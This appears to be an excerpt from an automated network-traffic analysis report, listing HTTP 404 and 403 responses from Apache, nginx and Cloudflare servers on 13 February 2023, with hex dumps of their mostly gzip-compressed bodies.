      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Mon, 13 Feb 2023 18:00:07 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Feb 2023 18:00:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.1.15x-litespeed-tag: 90d_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecontent-encoding: gzipvary: Accept-EncodingData Raw: 31 61 36 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 b6 b1 e8 e7 9d aa fc 07 98 5b de 19 25 24 45 f0 25 4a f3 f0 49 d6 ce b1 ab ec 24 95 75 7c ea 56 d6 35 05 91 90 c4 5d 8a 64 48 6a 34 e3 39 53 75 ff c6 fd 7b f7 97 dc ea 06 48 82 12 f5 98 57 ee c9 63 13 ef 52 24 d0 dd 68 34 1a 8d 46 a3 71 f1 c5 d7 7f 7c ff e3 ff fa d3 37 64 51 2d 93 ab 93 0b f8 87 24 2c 9d 5f 6a 3c 35 fe f2 41 83 77 9c 45 57 27 6f 2e 96 bc 62 24 5c b0 a2 e4 d5 a5 f6 97 1f 7f 6f 04 1a 19 36 5f 52 b6 e4 97 da 4d cc d7 79 56 54 1a 09 b3 b4 e2 69 75 a9 ad e3 a8 5a 5c 46 fc 26 0e b9 81 3f 74 12 a7 71 15 b3 c4 28 43 96 f0 4b 8a 70 88 fc 73 51 56 77 09 bf 3a a9 7f c3 bf e6 3a cb a7 46 b9 66 55 b8 20 f7 9d 4f f0 79 19 a7 02 f2 84 d8 5e 7e 7b de 5b 60 c1 e3 f9 a2 ea 2b f1 d0 29 df c1 15 2f e7 3d f8 b0 15 7d 90 80 98 63 f0 5c 0c 65 23 4f 04 5b 91 79 a7 45 36 cd aa f2 b4 61 dd e9 92 dd 1a f1 92 cd b9 91 17 1c 58 3b 49 58 31 e7 a7 c0 f6 8b 2a ae 12 7e f5 27 36 e7 24 cd 2a 32 cb 56 69 44 de bd 0d 6c 4a cf c9 8f 05 e7 53 56 7c be 18 8a 62 27 17 49 9c 7e 26 05 4f 2e 4f a3 b4 04 78 33 5e 85 8b 53 b2 28 f8 ec f2 74 38 ac 64 8d 8a f3 d2 0c b3 a5 40 d2 d4 d2 58 52 f1 22 65 15 d7 48 75 97 f3 4b 8d e5 79 12 87 ac 8a b3 74 58 94 e5 6f 6e 97 89 46 10 db a5 56 a3 27 ef 0a f6 b7 55 76 4e 7e cf 79 a4 09 5c da a2 aa f2 72 b2 8d 71 18 a7 11 bf 35 f3 45 3e 9c 71 1e 0d 51 2a 5a ba 9f 49 c1 fb 6c b9 e4 69 55 3e 96 94 50 d6 53 69 2a c3 22 ce ab ab 93 75 9c 46 d9 da bc 5e e7 7c 99 7d 8a 3f f0 aa 8a d3 79 49 2e c9 bd 36 65 25 ff 4b 91 68 13 d9 de 8f c3 8f c3 d2 5c 9b 59 31 ff 38 c4 4e 2d 3f 0e c3 ac e0 1f 87 58 f9 e3 90 ba a6 65 5a 1f 87 23 fb 76 64 7f 1c 6a ba c6 6f 2b 6d a2 99 79 3a d7 74 ad bc 99 3f 0d 5e 79 33 47 68 e5 cd fc 1b 01 b0 bc 41 80 d9 aa 08 b9 36 b9 d7 c2 2c 0d 59 85 64 48 7a 27 40 ee a6 48 7c 1c ae 73 23 4e c3 64 15 f1 f2 e3 f0 53 89 2f b0 9a 51 f0 84 b3 92 9b cb 38 35 3f 95 5f dd f0 e2 d2 37 a9 49 b5 87 87 f3 93 e1 af bf 20 3f 2e e2 92 cc e2 84 93 b8 24 6c 55 65 c6 9c a7 bc 60 15 8f c8 af 87 27 5f cc 56 69 08 b2 74 c6 75 a6 57 83 fb 1b 56 90 54 2f f4 4c 8f 2f 99 19 16 9c 55 fc 9b 84 43 1f 9e 69 21 4b 6f 58 a9 0d f4 fc 32 36 e7 bc 7a 0f ca e6 b6 7a f7 4e fd 75 a6 d9 91 36 38 af 01 93 f2 8c d7 80 d9 e5 87 aa 88 d3 b9 39 2b b2 e5 fb 05 2b de 67 11 d7 f9 e5 59 6e 86 09 67 c5 9f 79 58 9d 59 ba a5 c7 a6 d0 58 b1 29 86 f5 40 cf cd 59 9c 24 3f f2 db ea 8c 99 30 06 ee ce aa 45 5c ea 7c a0 5b ba 35 d0 63 b3 ca be 66 15 fb cb 9f bf Data Ascii: 1a60}k[%$E%JI$u|V5]dHj49Su{
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Feb 2023 18:00:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.1.15x-litespeed-tag: 90d_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecontent-encoding: gzipvary: Accept-EncodingData Raw: 31 61 36 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 b6 b1 e8 e7 9d aa fc 07 98 5b de 19 25 24 45 f0 25 4a f3 f0 49 d6 ce b1 ab ec 24 95 75 7c ea 56 d6 35 05 91 90 c4 5d 8a 64 48 6a 34 e3 39 53 75 ff c6 fd 7b f7 97 dc ea 06 48 82 12 f5 98 57 ee c9 63 13 ef 52 24 d0 dd 68 34 1a 8d 46 a3 71 f1 c5 d7 7f 7c ff e3 ff fa d3 37 64 51 2d 93 ab 93 0b f8 87 24 2c 9d 5f 6a 3c 35 fe f2 41 83 77 9c 45 57 27 6f 2e 96 bc 62 24 5c b0 a2 e4 d5 a5 f6 97 1f 7f 6f 04 1a 19 36 5f 52 b6 e4 97 da 4d cc d7 79 56 54 1a 09 b3 b4 e2 69 75 a9 ad e3 a8 5a 5c 46 fc 26 0e b9 81 3f 74 12 a7 71 15 b3 c4 28 43 96 f0 4b 8a 70 88 fc 73 51 56 77 09 bf 3a a9 7f c3 bf e6 3a cb a7 46 b9 66 55 b8 20 f7 9d 4f f0 79 19 a7 02 f2 84 d8 5e 7e 7b de 5b 60 c1 e3 f9 a2 ea 2b f1 d0 29 df c1 15 2f e7 3d f8 b0 15 7d 90 80 98 63 f0 5c 0c 65 23 4f 04 5b 91 79 a7 45 36 cd aa f2 b4 61 dd e9 92 dd 1a f1 92 cd b9 91 17 1c 58 3b 49 58 31 e7 a7 c0 f6 8b 2a ae 12 7e f5 27 36 e7 24 cd 2a 32 cb 56 69 44 de bd 0d 6c 4a cf c9 8f 05 e7 53 56 7c be 18 8a 62 27 17 49 9c 7e 26 05 4f 2e 4f a3 b4 04 78 33 5e 85 8b 53 b2 28 f8 ec f2 74 38 ac 64 8d 8a f3 d2 0c b3 a5 40 d2 d4 d2 58 52 f1 22 65 15 d7 48 75 97 f3 4b 8d e5 79 12 87 ac 8a b3 74 58 94 e5 6f 6e 97 89 46 10 db a5 56 a3 27 ef 0a f6 b7 55 76 4e 7e cf 79 a4 09 5c da a2 aa f2 72 b2 8d 71 18 a7 11 bf 35 f3 45 3e 9c 71 1e 0d 51 2a 5a ba 9f 49 c1 fb 6c b9 e4 69 55 3e 96 94 50 d6 53 69 2a c3 22 ce ab ab 93 75 9c 46 d9 da bc 5e e7 7c 99 7d 8a 3f f0 aa 8a d3 79 49 2e c9 bd 36 65 25 ff 4b 91 68 13 d9 de 8f c3 8f c3 d2 5c 9b 59 31 ff 38 c4 4e 2d 3f 0e c3 ac e0 1f 87 58 f9 e3 90 ba a6 65 5a 1f 87 23 fb 76 64 7f 1c 6a ba c6 6f 2b 6d a2 99 79 3a d7 74 ad bc 99 3f 0d 5e 79 33 47 68 e5 cd fc 1b 01 b0 bc 41 80 d9 aa 08 b9 36 b9 d7 c2 2c 0d 59 85 64 48 7a 27 40 ee a6 48 7c 1c ae 73 23 4e c3 64 15 f1 f2 e3 f0 53 89 2f b0 9a 51 f0 84 b3 92 9b cb 38 35 3f 95 5f dd f0 e2 d2 37 a9 49 b5 87 87 f3 93 e1 af bf 20 3f 2e e2 92 cc e2 84 93 b8 24 6c 55 65 c6 9c a7 bc 60 15 8f c8 af 87 27 5f cc 56 69 08 b2 74 c6 75 a6 57 83 fb 1b 56 90 54 2f f4 4c 8f 2f 99 19 16 9c 55 fc 9b 84 43 1f 9e 69 21 4b 6f 58 a9 0d f4 fc 32 36 e7 bc 7a 0f ca e6 b6 7a f7 4e fd 75 a6 d9 91 36 38 af 01 93 f2 8c d7 80 d9 e5 87 aa 88 d3 b9 39 2b b2 e5 fb 05 2b de 67 11 d7 f9 e5 59 6e 86 09 67 c5 9f 79 58 9d 59 ba a5 c7 a6 d0 58 b1 29 86 f5 40 cf cd 59 9c 24 3f f2 db ea 8c 99 30 06 ee ce aa 45 5c ea 7c a0 5b ba 35 d0 63 b3 ca be 66 15 fb cb 9f bf Data Ascii: 1a60}k[%$E%JI$u|V5]dHj49Su{
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Feb 2023 18:00:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.1.15x-litespeed-tag: 90d_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecontent-encoding: gzipvary: Accept-EncodingData Raw: 66 31 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 b6 b1 e8 e7 9d aa fc 07 98 5b de 19 25 24 45 f0 25 4a f3 f0 49 d6 ce b1 ab ec 24 95 75 7c ea 56 d6 35 05 91 90 c4 5d 8a 64 48 6a 34 e3 39 53 75 ff c6 fd 7b f7 97 dc ea 06 48 82 12 f5 98 57 ee c9 63 13 ef 52 24 d0 dd 68 34 1a 8d 46 a3 71 f1 c5 d7 7f 7c ff e3 ff fa d3 37 64 51 2d 93 ab 93 0b f8 87 24 2c 9d 5f 6a 3c 35 fe f2 41 83 77 9c 45 57 27 6f 2e 96 bc 62 24 5c b0 a2 e4 d5 a5 f6 97 1f 7f 6f 04 1a 19 36 5f 52 b6 e4 97 da 4d cc d7 79 56 54 1a 09 b3 b4 e2 69 75 a9 ad e3 a8 5a 5c 46 fc 26 0e b9 81 3f 74 12 a7 71 15 b3 c4 28 43 96 f0 4b 8a 70 88 fc 73 51 56 77 09 bf 3a a9 7f c3 bf e6 3a cb a7 46 b9 66 55 b8 20 f7 9d 4f f0 79 19 a7 02 f2 84 d8 5e 7e 7b de 5b 60 c1 e3 f9 a2 ea 2b f1 d0 29 df c1 15 2f e7 3d f8 b0 15 7d 90 80 98 63 f0 5c 0c 65 23 4f 04 5b 91 79 a7 45 36 cd aa f2 b4 61 dd e9 92 dd 1a f1 92 cd b9 91 17 1c 58 3b 49 58 31 e7 a7 c0 f6 8b 2a ae 12 7e f5 27 36 e7 24 cd 2a 32 cb 56 69 44 de bd 0d 6c 4a cf c9 8f 05 e7 53 56 7c be 18 8a 62 27 17 49 9c 7e 26 05 4f 2e 4f a3 b4 04 78 33 5e 85 8b 53 b2 28 f8 ec f2 74 38 ac 64 8d 8a f3 d2 0c b3 a5 40 d2 d4 d2 58 52 f1 22 65 15 d7 48 75 97 f3 4b 8d e5 79 12 87 ac 8a b3 74 58 94 e5 6f 6e 97 89 46 10 db a5 56 a3 27 ef 0a f6 b7 55 76 4e 7e cf 79 a4 09 5c da a2 aa f2 72 b2 8d 71 18 a7 11 bf 35 f3 45 3e 9c 71 1e 0d 51 2a 5a ba 9f 49 c1 fb 6c b9 e4 69 55 3e 96 94 50 d6 53 69 2a c3 22 ce ab ab 93 75 9c 46 d9 da bc 5e e7 7c 99 7d 8a 3f f0 aa 8a d3 79 49 2e c9 bd 36 65 25 ff 4b 91 68 13 d9 de 8f c3 8f c3 d2 5c 9b 59 31 ff 38 c4 4e 2d 3f 0e c3 ac e0 1f 87 58 f9 e3 90 ba a6 65 5a 1f 87 23 fb 76 64 7f 1c 6a ba c6 6f 2b 6d a2 99 79 3a d7 74 ad bc 99 3f 0d 5e 79 33 47 68 e5 cd fc 1b 01 b0 bc 41 80 d9 aa 08 b9 36 b9 d7 c2 2c 0d 59 85 64 48 7a 27 40 ee a6 48 7c 1c ae 73 23 4e c3 64 15 f1 f2 e3 f0 53 89 2f b0 9a 51 f0 84 b3 92 9b cb 38 35 3f 95 5f dd f0 e2 d2 37 a9 49 b5 87 87 f3 93 e1 af bf 20 3f 2e e2 92 cc e2 84 93 b8 24 6c 55 65 c6 9c a7 bc 60 15 8f c8 af 87 27 5f cc 56 69 08 b2 74 c6 75 a6 57 83 fb 1b 56 90 54 2f f4 4c 8f 2f 99 19 16 9c 55 fc 9b 84 43 1f 9e 69 21 4b 6f 58 a9 0d f4 fc 32 36 e7 bc 7a 0f ca e6 b6 7a f7 4e fd 75 a6 d9 91 36 38 af 01 93 f2 8c d7 80 d9 e5 87 aa 88 d3 b9 39 2b b2 e5 fb 05 2b de 67 11 d7 f9 e5 59 6e 86 09 67 c5 9f 79 58 9d 59 ba a5 c7 a6 d0 58 b1 29 86 f5 40 cf cd 59 9c 24 3f f2 db ea 8c 99 30 06 ee ce aa 45 5c ea 7c a0 5b ba 35 d0 63 b3 ca be 66 15 fb cb 9f bf 3f Data Ascii: f10}k[%$E%JI$u|V5]dHj49Su{
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Feb 2023 18:00:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1ym7HCO2KHh59%2FON6Letqyq5cl%2BBNMxfG28Rv%2BFs5%2FEyA%2FVB0GPCqQ5z5aEFZKAgGCOL4BpLQICt7F7Mbjv2C4uSPQFn6HVTsKRpf%2FY4I6D%2BwhGMoS8fySRhVRRjkCY31n5Oyms%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 798f7705f95b30f4-FRAContent-Encoding: gzipData Raw: 38 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 ac d8 8e 34 9a a2 eb 78 51 ef a6 89 51 3b 68 83 a2 30 38 c3 3b 12 63 0e 39 25 29 c9 42 ea ff be e0 3c e4 d1 c3 6e 82 c5 a2 fe 60 0d 5f 97 f7 71 78 79 78 c3 57 6f 3f 5c dc 7e ba be 84 85 cb 64 d4 0a 5f 51 fa 9b 48 41 3a b8 ba 84 b3 df 23 08 fd 00 24 92 59 3b 23 4a d3 cf 16 04 9e 82 96 5c 20 01 c9 d4 7c 46 50 d1 8f 37 24 82 f0 d5 6f a8 b8 48 7f a7 f4 49 54 25 07 e0 b8 a8 b3 6f 13 75 fe 82 a8 f3 6f 10 35 77 95 34 df 71 cc ca 43 29 94 ee 4a 5a 20 e3 51 2b 74 c2 49 8c de be bf 81 5c 0b e5 2c 38 0d b9 d1 0b 11 0b 87 1c ae ae e1 4f 58 af d7 7d ed 74 ae b9 d4 73 d1 4f 74 06 7f c2 85 d4 4b 9e 4a 66 30 0c 4a 21 ad 30 43 c7 20 59 30 63 d1 cd c8 c7 db 7f d1 73 02 41 3d b0 70 2e a7 f8 c7 52 ac 66 e4 42 2b 87 ca d1 db 4d 8e 04 92 b2 35 23 0e 1f 5c e0 8d 99 6e c5 bc 24 e5 57 fa f1 07 7a a1 b3 9c 39 11 cb a6 a0 ab cb d9 25 9f 63 63 9d 62 19 ce 88 d1 b1 76 b6 31 51 69 a1 38 3e f4 40 e9 54 4b a9 d7 07 4b 56 02 d7 b9 36 ae b1 68 2d b8 5b cc 38 ae 44 82 b4 68 f4 84 12 4e 30 49 6d c2 24 ce 86 a5 14 29 d4 3d 18 94 33 62 dd 46 a2 5d 20 3a 02 82 cf 48 92 de 95 5d 34 b1 96 c0 c2 60 3a 23 41 c2 15 4d e6 22 28 87 82 8c 09 d5 2f c6 83 a8 d5 6a 85 36 31 22 77 51 ab 93 2e 55 e2 84 56 Data Ascii: 890Xko7_qT54xQQ;h08;c9%)B<n`_qxyxWo?\~d_QHA:#$Y;#J\ |FP7$oHIT%ouo5w4qC)JZ Q+tI\,8OX}tsOtKJf0J!0C Y0csA=p.RfB+M5#\n$Wz9%ccbv1Qi8>@TKKV6h-[8DhN0Im$)=3bF] :H]4`:#AM"(/j61"wQ.UV
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Feb 2023 18:00:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GSXygt4W6rg9Xm9nsgbt48Yn%2FXQUQKDYSiDP9iuksgF7pH8RdAX9JsIHIouWaMh1R2aYGLh%2F3W0u%2F4aLWmU7gVvUFp2xV3X%2Bar5wghRXif3DgQq91Sk8b0IzCnXxDrkziNtHYcs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 798f7715dc7630c3-FRAContent-Encoding: gzipData Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 ac d8 8e 34 9a a2 eb 78 51 ef a6 89 51 3b 68 83 a2 30 38 c3 3b 12 63 0e 39 25 29 c9 42 ea ff be e0 3c e4 d1 c3 6e 82 c5 a2 fe 60 0d 5f 97 f7 71 78 79 78 c3 57 6f 3f 5c dc 7e ba be 84 85 cb 64 d4 0a 5f 51 fa 9b 48 41 3a b8 ba 84 b3 df 23 08 fd 00 24 92 59 3b 23 4a d3 cf 16 04 9e 82 96 5c 20 01 c9 d4 7c 46 50 d1 8f 37 24 82 f0 d5 6f a8 b8 48 7f a7 f4 49 54 25 07 e0 b8 a8 b3 6f 13 75 fe 82 a8 f3 6f 10 35 77 95 34 df 71 cc ca 43 29 94 ee 4a 5a 20 e3 51 2b 74 c2 49 8c de be bf 81 5c 0b e5 2c 38 0d b9 d1 0b 11 0b 87 1c ae ae e1 4f 58 af d7 7d ed 74 ae b9 d4 73 d1 4f 74 06 7f c2 85 d4 4b 9e 4a 66 30 0c 4a 21 ad 30 43 c7 20 59 30 63 d1 cd c8 c7 db 7f d1 73 02 41 3d b0 70 2e a7 f8 c7 52 ac 66 e4 42 2b 87 ca d1 db 4d 8e 04 92 b2 35 23 0e 1f 5c e0 8d 99 6e c5 bc 24 e5 57 fa f1 07 7a a1 b3 9c 39 11 cb a6 a0 ab cb d9 25 9f 63 63 9d 62 19 ce 88 d1 b1 76 b6 31 51 69 a1 38 3e f4 40 e9 54 4b a9 d7 07 4b 56 02 d7 b9 36 ae b1 68 2d b8 5b cc 38 ae 44 82 b4 68 f4 84 12 4e 30 49 6d c2 24 ce 86 a5 14 29 d4 3d 18 94 33 62 dd 46 a2 5d 20 3a 02 82 cf 48 92 de 95 5d 34 b1 96 c0 c2 60 3a 23 41 c2 15 4d e6 22 28 87 82 8c 09 d5 2f c6 83 a8 d5 6a 85 36 31 22 77 51 ab 93 2e 55 e2 84 56 9d ee 17 91 76 b8 Data Ascii: 89aXko7_qT54xQQ;h08;c9%)B<n`_qxyxWo?\~d_QHA:#$Y;#J\ |FP7$oHIT%ouo5w4qC)JZ Q+tI\,8OX}tsOtKJf0J!0C Y0csA=p.RfB+M5#\n$Wz9%ccbv1Qi8>@TKKV6h-[8DhN0Im$)=3bF] :H]4`:#AM"(/j61"wQ.UVv
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Feb 2023 18:00:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DDXeza%2Bu0J5lGqHMUkkVpiuxklOeTWll8xCxMe5TjCGFKmwb2yOxkLtGZ1fL1Ur9B8Hskp6x9D%2BEWOIwKtQKtzjFPlOw8TN8VPoZNR99U1yZc5ftxC2uVHS2NcLPSjDW4B5rW%2FA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 798f7725aaaf9a0c-FRAContent-Encoding: gzipData Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 2c 3f 22 8d a6 e8 3a 5e d4 bb 69 62 d4 0e da a0 28 0c ce f0 8e c4 98 43 4e 49 4a b2 90 fa bf 2f 38 0f 79 f4 88 9b 60 b1 a8 3f 58 c3 d7 e5 7d 1c 5e 1e de f0 d5 9b f7 97 77 1f 6f ae 60 e1 32 19 b5 c2 57 94 fe 26 52 90 0e ae af e0 fc f7 08 42 3f 00 89 64 d6 ce 88 d2 f4 93 05 81 67 a0 25 17 48 40 32 35 9f 11 54 f4 c3 2d 89 20 7c f5 1b 2a 2e d2 df 29 7d 16 55 c9 01 38 2e ea fc db 44 5d bc 20 ea e2 1b 44 cd 5d 25 cd 77 1c b3 f2 50 0a a5 bb 92 16 c8 78 d4 0a 9d 70 12 a3 37 ef 6e 21 d7 42 39 0b 4e 43 6e f4 42 c4 c2 21 87 eb 1b f8 13 d6 eb 75 5f 3b 9d 6b 2e f5 5c f4 13 9d c1 9f 70 29 f5 92 a7 92 19 0c 83 52 48 2b cc d0 31 48 16 cc 58 74 33 f2 e1 ee 5f f4 82 40 50 0f 2c 9c cb 29 fe b1 14 ab 19 b9 d4 ca a1 72 f4 6e 93 23 81 a4 6c cd 88 c3 47 17 78 63 a6 5b 31 2f 49 f9 95 7e f8 81 5e ea 2c 67 4e c4 b2 29 e8 fa 6a 76 c5 e7 d8 58 a7 58 86 33 62 74 ac 9d 6d 4c 54 5a 28 8e 8f 3d 50 3a d5 52 ea f5 c1 92 95 c0 75 ae 8d 6b 2c 5a 0b ee 16 33 8e 2b 91 20 2d 1a 3d a1 84 13 4c 52 9b 30 89 b3 61 29 45 0a f5 00 06 e5 8c 58 b7 91 68 17 88 8e 80 e0 33 92 a4 f7 65 17 4d ac 25 b0 30 98 ce 48 90 70 45 93 b9 08 ca a1 20 63 42 f5 8b f1 20 6a b5 5a a1 4d 8c c8 5d d4 ea a4 4b 95 38 a1 55 a7 fb 59 a4 1d ae 93 65 Data Ascii: 89aXko7_qT5,?":^ib(CNIJ/8y`?X}^wo`2W&RB?dg%H@25T- |*.)}U8.D] D]%wPxp7n!B9NCnB!u_;k.\p)RH+1HXt3_@P,)rn#lGxc[1/I~^,gN)jvXX3btmLTZ(=P:Ruk,Z3+ -=LR0a)EXh3eM%0HpE cB jZM]K8UYe
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Feb 2023 18:00:48 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CB2jRGpIUHDGMIyW1iw8JtM966ohYpJFqI2fe7kcmog2Ez%2FH6VyviUBj9SLct1Om%2BBJUkmogVVpMqic3MIDNsEnUMgMjGs9wtvrP7kkePrHpTy7W8GxnrqEylv%2Fez89NsGjZd0Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 798f77357be39963-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 30 Data Ascii: error code: 1000
